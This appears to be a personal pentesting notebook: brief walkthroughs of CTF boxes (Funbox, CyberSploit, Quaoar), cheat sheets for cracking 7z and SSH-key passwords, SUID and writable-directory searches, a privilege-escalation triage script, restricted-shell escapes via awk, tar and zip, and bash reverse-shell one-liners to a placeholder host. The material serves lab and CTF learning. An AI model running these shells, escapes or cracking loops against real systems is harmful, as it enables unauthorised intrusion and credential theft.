A script that walks through the privilege escalation checklist from
https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
Followed by:
https://github.com/mzet-/linux-exploit-suggester
And again:
So as not to redo the same ones :)
CyberSploit: 1
robots.txt + kernel exploit
CyberSploit: 2
rot47 + password on the website + docker (GTFOBins)
Funbox3: Easy
easy password/SQL injection + p0wny-shell + sudo (time, pkexec or mtr)
FourAndSix2
nfs + hashcat (7z) + id_rsa (hint in the images) + less (GTFOBins)
FourAndSix
mount /shared; mount / is not exported
Funbox1
WordPress weak password (wpscan), upload a shell; the ssh user (joe) has the same password; bad permissions between joe and funny; crontab executed by funny; reverse shell; put a new ssh key on funny; funny is a member of lxd (https://www.hackingarticles.in/lxd-privilege-escalation/ : new image, add a mapping for root, connect to the image). There is a faster way: the root crontab runs the same script as funny's :) :) so you can modify /root, list the flag or whatever, set a SUID bit, add a sudo rule...
Funbox2: Rookie
anonymous ftp, hidden files, list of password-protected zips, zip2john on all the zips, 2 have easy passwords, unprotected rsa key, the user belongs to the lxd group, then the same as Funbox1
Funbox4: CTF
ROBOTS.txt, scroll down, hidden file: upload.php (add the extension to dirb), upload a shell, check the user's home, bruteforce with rockyou + "!" for thomas, and normally gcc + kernel exploit, but there is no gcc on the server....
Quaoar:
WordPress weak password or plugin vulnerability (wpscan), reverse shell, wp-config.php (root db password), weak root password (same as the db) or weak wpadmin
Funbox5: Next Level
dirb, Request Control plugin for Firefox (for IP redirection)
Cheat sheet
perl 7z2hashcat.pl ../tmp/backup.7z > ../tmp/hash.txt
# or
7z2john.py archive.7z > hash.txt
then (https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/):
hashcat -m 11600 lightweight7z.hash /usr/share/wordlists/rockyou.txt
or (https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c)
# id_rsa.hash is produced with ssh2john.py id_rsa > id_rsa.hash
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
From the command line (slow, but needs no hash extraction):
# 7z exits non-zero on a wrong password (CRC check) and grep confirms the extracted content; -y avoids the overwrite prompt on each try
while IFS= read -r line; do 7z e -y -oout -p"$line" backup.7z >/dev/null 2>&1 && grep -iRl SSH out && { echo "$line"; break; }; done < /usr/share/wordlists/rockyou.txt
# on success the key is rewritten with the passphrase "password", so work on a copy of id_rsa
while IFS= read -r line; do ssh-keygen -p -P "$line" -N password -f id_rsa >/dev/null 2>&1 && { echo "$line"; break; }; done < /usr/share/wordlists/rockyou.txt
Cheat sheet, scanning for common URLs
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt
To find group- or world-writable directories (these are the write bits, not the sticky bit; the sticky bit itself would be -perm -1000):
find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \; 2>/dev/null
For SUID/SGID files (https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/)
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
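The two finds above, together with the cron and lxd findings from Funbox1 and Funbox2, gathered into one small POSIX sh triage script. This is an added example, not code from this page or from any of the linked tools: the function names and the TRIAGE_ROOT variable are my own, every function takes the root or file to inspect so it can be run against a test tree, and the crontab parser assumes the system crontab format (five schedule fields or an @keyword, then the user, then the command).

```shell
#!/bin/sh
# privesc-triage.sh (added example): the manual checks from this page as functions.

# 1. Directories writable by group or others (what the find above really matches).
find_writable_dirs() {
  find "${1:-/}" -xdev -type d \( -perm -g+w -o -perm -o+w \) 2>/dev/null
}

# 2. SUID / SGID files, the classic GTFOBins entry point.
find_suid_sgid() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# 3. System-crontab entries (schedule user command) whose command references a file
#    the current user can write: the Funbox1 case, where root's cron ran funny's script.
#    Prints "cron-user path" for each hit.
find_writable_cron_scripts() {
  crontab_file="${1:-/etc/crontab}"
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac
    set -f; set -- $line; set +f          # split on whitespace without globbing the '*' fields
    case "$1" in *=*) continue ;; esac    # VAR=value lines (SHELL=, PATH=, MAILTO=)
    case "$1" in
      @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;   # @daily user command
      *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;   # m h dom mon dow user command
    esac
    for word; do                          # every word of the command that is a writable file
      if [ -f "$word" ] && [ -w "$word" ]; then
        printf '%s %s\n' "$user" "$word"
      fi
    done
  done < "$crontab_file"
}

# 4. Group memberships that are root-equivalent (lxd/docker: mount the host disk inside
#    a container, as in Funbox1/Funbox2). Pass a group list to test; default is id -Gn.
check_privileged_groups() {
  for g in ${1:-$(id -Gn)}; do
    case "$g" in lxd|docker|disk|sudo|wheel|adm) printf '%s\n' "$g" ;; esac
  done
}

# Full sweep of a live box: TRIAGE_ROOT=/ sh privesc-triage.sh
if [ -n "${TRIAGE_ROOT:-}" ]; then
  echo "== writable dirs ==";  find_writable_dirs "$TRIAGE_ROOT"
  echo "== suid/sgid ==";      find_suid_sgid "$TRIAGE_ROOT"
  echo "== writable cron ==";  find_writable_cron_scripts /etc/crontab
  echo "== groups ==";         check_privileged_groups
fi
```

The cron check reports any word of the command that is a writable regular file, not only the first one, because the interesting entry usually looks like `/bin/sh /home/funny/backup.sh`: the interpreter is not writable, the script is. Nothing runs unless TRIAGE_ROOT is set, so the file can be sourced into an existing shell to use the functions one by one.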
Reverse shells from various sources
Listen:
nc -l -vv -p <PORT>
Bash examples:
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
Server-side template hacking helper
Escaping restricted shells.
And tar, zip or awk can be used to launch an interactive shell; I learn something new every day...
A checklist: https://github.com/frizb/Linux-Privilege-Escalation
Another: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
To look at: https://www.metahackers.pro/breakout-of-restricted-shell/
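The three escapes named above (tar, zip, awk), as an added example that is not code from this page or from the linked articles: each one abuses a program that a restricted shell often leaves on its allowed list to run an arbitrary command, in the way GTFOBins documents. The function names and the optional command argument are mine; the default command is /bin/sh.

```shell
#!/bin/sh
# restricted-shell-escapes.sh (added example): spawn a command from a program the
# restricted shell still lets you run. Argument: the command (default /bin/sh).
# First look at what is allowed: echo $PATH; echo $SHELL; ls -l $(which awk tar zip)

# awk: every awk has system(), which hands the string to /bin/sh -c.
awk_escape() {
  awk -v cmd="${1:-/bin/sh}" 'BEGIN { system(cmd) }'
}

# GNU tar: a checkpoint action of type exec runs its argument through the shell
# while archiving; /dev/null as both archive and member keeps it instant.
tar_escape() {
  tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="${1:-/bin/sh}"
}

# Info-ZIP zip: -T tests the archive and -TT names the test command; zip appends
# the archive path to it, so the trailing '#' comments that argument away.
zip_escape() {
  archive=$(mktemp -u) && zip -q "$archive" /etc/hosts -T -TT "${1:-/bin/sh} #"
  rm -f "$archive"
}

# Demo: run `id` through awk; with no argument awk_escape drops into a shell.
awk_escape id
```

Only awk_escape is exercised at the bottom: tar_escape needs GNU tar (busybox tar has no --checkpoint-action) and zip_escape needs Info-ZIP zip, so check which binaries are really on the box before relying on them. Once out, the usual next step is to fix PATH and SHELL (`export PATH=/usr/bin:/bin; export SHELL=/bin/sh`), since the restricted shell usually leaves them pointing at its own jail.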
Frida, a tool for reverse-engineering binaries (in particular, hooking function calls).
(via http://sebsauvage.net/links/index.php?o-nb_A)
and also: http://www.showmycode.com/